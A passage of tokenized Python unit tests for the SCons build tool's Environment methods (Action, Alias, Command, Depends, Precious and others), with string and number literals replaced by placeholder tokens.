== string . lower ( test . 
workpath ( sub3_xxx_exe ) ) , wi <EOL> forward_slash = test . workpath ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> wi = env . WhereIs ( '<STR_LIT>' , path = forward_slash , pathext = '<STR_LIT>' ) <EOL> assert string . lower ( wi ) == string . lower ( test . workpath ( sub3_xxx_exe ) ) , wi <EOL> def test_Action ( self ) : <EOL> """<STR_LIT>""" <EOL> import SCons . Action <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' ) <EOL> a = env . Action ( '<STR_LIT:foo>' ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . CommandAction , a . __class__ <EOL> a = env . Action ( '<STR_LIT>' ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . CommandAction , a . __class__ <EOL> a = env . Action ( '<STR_LIT>' ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . LazyAction , a . __class__ <EOL> a = env . Action ( [ '<STR_LIT>' , '<STR_LIT:foo>' ] ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . ListAction , a . __class__ <EOL> def func ( arg ) : <EOL> pass <EOL> a = env . Action ( func ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . FunctionAction , a . __class__ <EOL> def test_AddPostAction ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> n = env . AddPostAction ( '<STR_LIT>' , lambda x : x ) <EOL> assert str ( n [ <NUM_LIT:0> ] ) == '<STR_LIT>' , n [ <NUM_LIT:0> ] <EOL> n = env . AddPostAction ( [ '<STR_LIT>' , '<STR_LIT>' ] , lambda x : x ) <EOL> assert str ( n [ <NUM_LIT:0> ] ) == '<STR_LIT>' , n [ <NUM_LIT:0> ] <EOL> assert str ( n [ <NUM_LIT:1> ] ) == '<STR_LIT>' , n [ <NUM_LIT:1> ] <EOL> def test_AddPreAction ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> n = env . AddPreAction ( '<STR_LIT>' , lambda x : x ) <EOL> assert str ( n [ <NUM_LIT:0> ] ) == '<STR_LIT>' , n [ <NUM_LIT:0> ] <EOL> n = env . 
AddPreAction ( [ '<STR_LIT>' , '<STR_LIT>' ] , lambda x : x ) <EOL> assert str ( n [ <NUM_LIT:0> ] ) == '<STR_LIT>' , n [ <NUM_LIT:0> ] <EOL> assert str ( n [ <NUM_LIT:1> ] ) == '<STR_LIT>' , n [ <NUM_LIT:1> ] <EOL> def test_Alias ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' , EA = '<STR_LIT>' ) <EOL> tgt = env . Alias ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert str ( tgt ) == '<STR_LIT>' , tgt <EOL> assert tgt . sources == [ ] , tgt . sources <EOL> assert not hasattr ( tgt , '<STR_LIT>' ) , tgt . builder <EOL> tgt = env . Alias ( '<STR_LIT>' , None ) [ <NUM_LIT:0> ] <EOL> assert str ( tgt ) == '<STR_LIT>' , tgt <EOL> assert tgt . sources == [ ] , tgt . sources <EOL> tgt = env . Alias ( '<STR_LIT>' , [ ] ) [ <NUM_LIT:0> ] <EOL> assert str ( tgt ) == '<STR_LIT>' , tgt <EOL> assert tgt . sources == [ ] , tgt . sources <EOL> tgt = env . Alias ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert str ( tgt ) == '<STR_LIT>' , tgt <EOL> assert len ( tgt . sources ) == <NUM_LIT:2> , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:0> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:1> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> n = env . Alias ( tgt , source = [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert n is tgt , n <EOL> assert len ( tgt . sources ) == <NUM_LIT:4> , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:2> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:3> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> n = env . Alias ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert n is tgt , n <EOL> assert len ( tgt . sources ) == <NUM_LIT:5> , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:4> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> t1 , t2 = env . 
Alias ( [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert str ( t1 ) == '<STR_LIT>' , t1 <EOL> assert str ( t2 ) == '<STR_LIT>' , t2 <EOL> assert len ( t1 . sources ) == <NUM_LIT:2> , map ( str , t1 . sources ) <EOL> assert str ( t1 . sources [ <NUM_LIT:0> ] ) == '<STR_LIT>' , map ( str , t1 . sources ) <EOL> assert str ( t1 . sources [ <NUM_LIT:1> ] ) == '<STR_LIT>' , map ( str , t1 . sources ) <EOL> assert len ( t2 . sources ) == <NUM_LIT:2> , map ( str , t2 . sources ) <EOL> assert str ( t2 . sources [ <NUM_LIT:0> ] ) == '<STR_LIT>' , map ( str , t2 . sources ) <EOL> assert str ( t2 . sources [ <NUM_LIT:1> ] ) == '<STR_LIT>' , map ( str , t2 . sources ) <EOL> tgt = env . Alias ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> tgt = env . Alias ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = map ( str , tgt . sources ) <EOL> assert s == [ '<STR_LIT>' , '<STR_LIT>' ] , s <EOL> tgt = env . Alias ( tgt , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = map ( str , tgt . sources ) <EOL> assert s == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , s <EOL> tgt = env . Alias ( '<STR_LIT>' , None , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> s = str ( tgt . builder . action ) <EOL> assert s == "<STR_LIT>" , s <EOL> tgt = env . Alias ( '<STR_LIT>' , None , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> s = str ( tgt . builder . action ) <EOL> assert s == "<STR_LIT>" , s <EOL> tgt = env . Alias ( tgt , None , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> s = str ( tgt . builder . action ) <EOL> assert s == "<STR_LIT>" , s <EOL> def test_AlwaysBuild ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> t = env . AlwaysBuild ( '<STR_LIT:a>' , '<STR_LIT>' , [ '<STR_LIT:c>' , '<STR_LIT:d>' ] , '<STR_LIT>' , <EOL> env . fs . Dir ( '<STR_LIT>' ) , env . fs . File ( '<STR_LIT:file>' ) ) <EOL> assert t [ <NUM_LIT:0> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:0> ] . 
path == '<STR_LIT:a>' <EOL> assert t [ <NUM_LIT:0> ] . always_build <EOL> assert t [ <NUM_LIT:1> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:1> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:1> ] . always_build <EOL> assert t [ <NUM_LIT:2> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:2> ] . path == '<STR_LIT:c>' <EOL> assert t [ <NUM_LIT:2> ] . always_build <EOL> assert t [ <NUM_LIT:3> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:3> ] . path == '<STR_LIT:d>' <EOL> assert t [ <NUM_LIT:3> ] . always_build <EOL> assert t [ <NUM_LIT:4> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:4> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:4> ] . always_build <EOL> assert t [ <NUM_LIT:5> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:5> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:5> ] . always_build <EOL> assert t [ <NUM_LIT:6> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:6> ] . path == '<STR_LIT:file>' <EOL> assert t [ <NUM_LIT:6> ] . always_build <EOL> def test_VariantDir ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def Dir ( self , name ) : <EOL> return name <EOL> def VariantDir ( self , variant_dir , src_dir , duplicate ) : <EOL> self . variant_dir = variant_dir <EOL> self . src_dir = src_dir <EOL> self . duplicate = duplicate <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> env . VariantDir ( '<STR_LIT>' , '<STR_LIT:src>' ) <EOL> assert env . fs . variant_dir == '<STR_LIT>' , env . fs . variant_dir <EOL> assert env . fs . src_dir == '<STR_LIT:src>' , env . fs . src_dir <EOL> assert env . fs . duplicate == <NUM_LIT:1> , env . fs . duplicate <EOL> env . VariantDir ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> assert env . fs . variant_dir == '<STR_LIT>' , env . fs . variant_dir <EOL> assert env . fs . src_dir == '<STR_LIT>' , env . fs . src_dir <EOL> assert env . 
fs . duplicate == <NUM_LIT:0> , env . fs . duplicate <EOL> def test_Builder ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' ) <EOL> b = env . Builder ( action = '<STR_LIT:foo>' ) <EOL> assert not b is None , b <EOL> b = env . Builder ( action = '<STR_LIT>' ) <EOL> assert not b is None , b <EOL> b = env . Builder ( action = [ '<STR_LIT>' , '<STR_LIT:foo>' ] ) <EOL> assert not b is None , b <EOL> def func ( arg ) : <EOL> pass <EOL> b = env . Builder ( action = func ) <EOL> assert not b is None , b <EOL> b = env . Builder ( generator = func ) <EOL> assert not b is None , b <EOL> def test_CacheDir ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( CD = '<STR_LIT>' ) <EOL> env . CacheDir ( '<STR_LIT:foo>' ) <EOL> assert env . _CacheDir_path == '<STR_LIT:foo>' , env . _CacheDir_path <EOL> env . CacheDir ( '<STR_LIT>' ) <EOL> assert env . _CacheDir_path == '<STR_LIT>' , env . _CacheDir_path <EOL> def test_Clean ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> CT = SCons . Environment . CleanTargets <EOL> foo = env . arg2nodes ( '<STR_LIT:foo>' ) [ <NUM_LIT:0> ] <EOL> fff = env . arg2nodes ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> t = env . Clean ( '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> l = map ( str , CT [ foo ] ) <EOL> assert l == [ '<STR_LIT>' ] , l <EOL> t = env . Clean ( foo , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> l = map ( str , CT [ foo ] ) <EOL> assert l == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , l <EOL> eee = env . arg2nodes ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> t = env . Clean ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> l = map ( str , CT [ fff ] ) <EOL> assert l == [ '<STR_LIT>' ] , l <EOL> t = env . Clean ( fff , [ eee , '<STR_LIT>' ] ) <EOL> l = map ( str , CT [ fff ] ) <EOL> assert l == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , l <EOL> def test_Command ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> t = env . 
Command ( target = '<STR_LIT>' , source = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> action = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert not t . builder is None <EOL> assert t . builder . action . __class__ . __name__ == '<STR_LIT>' <EOL> assert t . builder . action . cmd_list == '<STR_LIT>' <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> sub = env . fs . Dir ( '<STR_LIT>' ) <EOL> t = env . Command ( target = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> action = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> def testFunc ( env , target , source ) : <EOL> assert str ( target [ <NUM_LIT:0> ] ) == '<STR_LIT>' <EOL> assert '<STR_LIT>' in map ( str , source ) and '<STR_LIT>' in map ( str , source ) , map ( str , source ) <EOL> return <NUM_LIT:0> <EOL> t = env . Command ( target = '<STR_LIT>' , source = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> action = testFunc ) [ <NUM_LIT:0> ] <EOL> assert not t . builder is None <EOL> assert t . builder . action . __class__ . __name__ == '<STR_LIT>' <EOL> t . build ( ) <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> x = [ ] <EOL> def test2 ( baz , x = x ) : <EOL> x . append ( baz ) <EOL> env = self . TestEnvironment ( TEST2 = test2 ) <EOL> t = env . Command ( target = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> XYZ = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert not t . builder is None <EOL> t . build ( ) <EOL> assert x [ <NUM_LIT:0> ] == '<STR_LIT>' , x <EOL> t = env . Command ( target = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> action = '<STR_LIT:foo>' , <EOL> X = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert str ( t ) == '<STR_LIT>' , str ( t ) <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> env = self . 
TestEnvironment ( source_scanner = '<STR_LIT>' ) <EOL> t = env . Command ( target = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> action = '<STR_LIT:foo>' , <EOL> source_scanner = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . builder . source_scanner == '<STR_LIT>' , t . builder . source_scanner <EOL> def test_Configure ( self ) : <EOL> """<STR_LIT>""" <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> save = os . getcwd ( ) <EOL> try : <EOL> os . chdir ( test . workpath ( ) ) <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' ) <EOL> def func ( arg ) : <EOL> pass <EOL> c = env . Configure ( ) <EOL> assert not c is None , c <EOL> c . Finish ( ) <EOL> c = env . Configure ( custom_tests = { '<STR_LIT:foo>' : func , '<STR_LIT>' : func } ) <EOL> assert not c is None , c <EOL> assert hasattr ( c , '<STR_LIT:foo>' ) <EOL> assert hasattr ( c , '<STR_LIT>' ) <EOL> c . Finish ( ) <EOL> finally : <EOL> os . chdir ( save ) <EOL> def test_Depends ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> t = env . Depends ( target = '<STR_LIT>' , <EOL> dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . depends ) == <NUM_LIT:1> <EOL> d = t . depends [ <NUM_LIT:0> ] <EOL> assert d . __class__ . __name__ == '<STR_LIT>' , d . __class__ . __name__ <EOL> assert d . path == '<STR_LIT>' <EOL> t = env . Depends ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . depends ) == <NUM_LIT:1> <EOL> d = t . depends [ <NUM_LIT:0> ] <EOL> assert d . __class__ . __name__ == '<STR_LIT>' , d . __class__ . 
__name__ <EOL> assert d . path == '<STR_LIT>' <EOL> t = env . Depends ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . depends ) == <NUM_LIT:1> <EOL> d = t . depends [ <NUM_LIT:0> ] <EOL> assert d . __class__ . __name__ == '<STR_LIT>' , d . __class__ . __name__ <EOL> assert d . path == '<STR_LIT>' <EOL> def test_Dir ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def Dir ( self , name ) : <EOL> return '<STR_LIT>' % name <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> d = env . Dir ( '<STR_LIT:d>' ) <EOL> assert d == '<STR_LIT>' , d <EOL> d = env . Dir ( '<STR_LIT>' ) <EOL> assert d == '<STR_LIT>' , d <EOL> d = env . Dir ( '<STR_LIT>' ) <EOL> assert d == '<STR_LIT>' , d <EOL> d = env . Dir ( [ '<STR_LIT>' ] ) <EOL> assert d == [ '<STR_LIT>' ] , d <EOL> d = env . Dir ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert d == [ '<STR_LIT>' , '<STR_LIT>' ] , d <EOL> def test_NoClean ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> t = env . NoClean ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> assert t [ <NUM_LIT:0> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:0> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:0> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:0> ] . noclean <EOL> assert t [ <NUM_LIT:1> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:1> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:1> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:1> ] . noclean <EOL> assert t [ <NUM_LIT:2> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:2> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:2> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:2> ] . 
noclean <EOL> assert t [ <NUM_LIT:3> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:3> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:3> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:3> ] . noclean <EOL> assert t [ <NUM_LIT:4> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:4> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:4> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:4> ] . noclean <EOL> def test_Dump ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT:foo>' ) <EOL> assert env . Dump ( '<STR_LIT>' ) == "<STR_LIT>" , env . Dump ( '<STR_LIT>' ) <EOL> assert len ( env . Dump ( ) ) > <NUM_LIT:200> , env . Dump ( ) <EOL> def test_Environment ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> e2 = env . Environment ( X = '<STR_LIT>' , Y = '<STR_LIT>' ) <EOL> assert e2 [ '<STR_LIT:X>' ] == '<STR_LIT>' , e2 [ '<STR_LIT:X>' ] <EOL> assert e2 [ '<STR_LIT:Y>' ] == '<STR_LIT>' , e2 [ '<STR_LIT:Y>' ] <EOL> def test_Execute ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyAction : <EOL> def __init__ ( self , * args , ** kw ) : <EOL> self . args = args <EOL> def __call__ ( self , target , source , env ) : <EOL> return "<STR_LIT>" % self . args <EOL> env = Environment ( ) <EOL> env . Action = MyAction <EOL> result = env . Execute ( "<STR_LIT:foo>" ) <EOL> assert result == "<STR_LIT>" , result <EOL> def test_Entry ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def Entry ( self , name ) : <EOL> return '<STR_LIT>' % name <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> e = env . Entry ( '<STR_LIT:e>' ) <EOL> assert e == '<STR_LIT>' , e <EOL> e = env . Entry ( '<STR_LIT>' ) <EOL> assert e == '<STR_LIT>' , e <EOL> e = env . Entry ( '<STR_LIT>' ) <EOL> assert e == '<STR_LIT>' , e <EOL> e = env . Entry ( [ '<STR_LIT>' ] ) <EOL> assert e == [ '<STR_LIT>' ] , e <EOL> e = env . 
Entry ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert e == [ '<STR_LIT>' , '<STR_LIT>' ] , e <EOL> def test_File ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def File ( self , name ) : <EOL> return '<STR_LIT>' % name <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> f = env . File ( '<STR_LIT:f>' ) <EOL> assert f == '<STR_LIT>' , f <EOL> f = env . File ( '<STR_LIT>' ) <EOL> assert f == '<STR_LIT>' , f <EOL> f = env . File ( '<STR_LIT>' ) <EOL> assert f == '<STR_LIT>' , f <EOL> f = env . File ( [ '<STR_LIT>' ] ) <EOL> assert f == [ '<STR_LIT>' ] , f <EOL> f = env . File ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert f == [ '<STR_LIT>' , '<STR_LIT>' ] , f <EOL> def test_FindFile ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> r = env . FindFile ( '<STR_LIT:foo>' , [ '<STR_LIT>' ] ) <EOL> assert r is None , r <EOL> def test_Flatten ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> l = env . Flatten ( [ <NUM_LIT:1> ] ) <EOL> assert l == [ <NUM_LIT:1> ] <EOL> l = env . Flatten ( [ <NUM_LIT:1> , [ <NUM_LIT:2> , [ <NUM_LIT:3> , [ <NUM_LIT:4> ] ] ] ] ) <EOL> assert l == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , l <EOL> def test_GetBuildPath ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( MAGIC = '<STR_LIT>' ) <EOL> p = env . GetBuildPath ( '<STR_LIT:foo>' ) <EOL> assert p == '<STR_LIT:foo>' , p <EOL> p = env . GetBuildPath ( '<STR_LIT>' ) <EOL> assert p == '<STR_LIT>' , p <EOL> def test_Ignore ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> t = env . Ignore ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . 
__class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . ignore ) == <NUM_LIT:1> <EOL> i = t . ignore [ <NUM_LIT:0> ] <EOL> assert i . __class__ . __name__ == '<STR_LIT>' , i . __class__ . __name__ <EOL> assert i . path == '<STR_LIT>' <EOL> t = env . Ignore ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . ignore ) == <NUM_LIT:1> <EOL> i = t . ignore [ <NUM_LIT:0> ] <EOL> assert i . __class__ . __name__ == '<STR_LIT>' , i . __class__ . __name__ <EOL> assert i . path == '<STR_LIT>' <EOL> t = env . Ignore ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . ignore ) == <NUM_LIT:1> <EOL> i = t . ignore [ <NUM_LIT:0> ] <EOL> assert i . __class__ . __name__ == '<STR_LIT>' , i . __class__ . __name__ <EOL> assert i . path == '<STR_LIT>' <EOL> def test_Literal ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> list = env . subst_list ( [ env . Literal ( '<STR_LIT>' ) , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert list == [ '<STR_LIT>' , '<STR_LIT>' ] , list <EOL> list = env . subst_list ( [ '<STR_LIT>' , env . Literal ( '<STR_LIT>' ) ] ) [ <NUM_LIT:0> ] <EOL> assert list == [ '<STR_LIT>' , '<STR_LIT>' ] , list <EOL> def test_Local ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' ) <EOL> l = env . Local ( env . fs . File ( '<STR_LIT>' ) ) <EOL> assert str ( l [ <NUM_LIT:0> ] ) == '<STR_LIT>' , l [ <NUM_LIT:0> ] <EOL> l = env . 
Local ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert str ( l [ <NUM_LIT:0> ] ) == '<STR_LIT>' , l [ <NUM_LIT:0> ] <EOL> assert str ( l [ <NUM_LIT:1> ] ) == '<STR_LIT>' , l [ <NUM_LIT:1> ] <EOL> def test_Precious ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> t = env . Precious ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> assert t [ <NUM_LIT:0> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:0> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:0> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:0> ] . precious <EOL> assert t [ <NUM_LIT:1> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:1> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:1> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:1> ] . precious <EOL> assert t [ <NUM_LIT:2> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:2> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:2> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:2> ] . precious <EOL> assert t [ <NUM_LIT:3> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:3> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:3> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:3> ] . precious <EOL> assert t [ <NUM_LIT:4> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:4> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:4> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:4> ] . precious <EOL> def test_Repository ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def __init__ ( self ) : <EOL> self . list = [ ] <EOL> def Repository ( self , * dirs ) : <EOL> self . list . extend ( list ( dirs ) ) <EOL> def Dir ( self , name ) : <EOL> return name <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> env . Repository ( '<STR_LIT>' ) <EOL> env . 
Repository ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> expect = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert env . fs . list == expect , env . fs . list <EOL> def test_Scanner ( self ) : <EOL> """<STR_LIT>""" <EOL> def scan ( node , env , target , arg ) : <EOL> pass <EOL> env = self . TestEnvironment ( FOO = scan ) <EOL> s = env . Scanner ( '<STR_LIT:foo>' ) <EOL> assert not s is None , s <EOL> s = env . Scanner ( function = '<STR_LIT:foo>' ) <EOL> assert not s is None , s <EOL> if <NUM_LIT:0> : <EOL> s = env . Scanner ( '<STR_LIT>' ) <EOL> assert not s is None , s <EOL> s = env . Scanner ( function = '<STR_LIT>' ) <EOL> assert not s is None , s <EOL> def test_SConsignFile ( self ) : <EOL> """<STR_LIT>""" <EOL> import SCons . SConsign <EOL> class MyFS : <EOL> 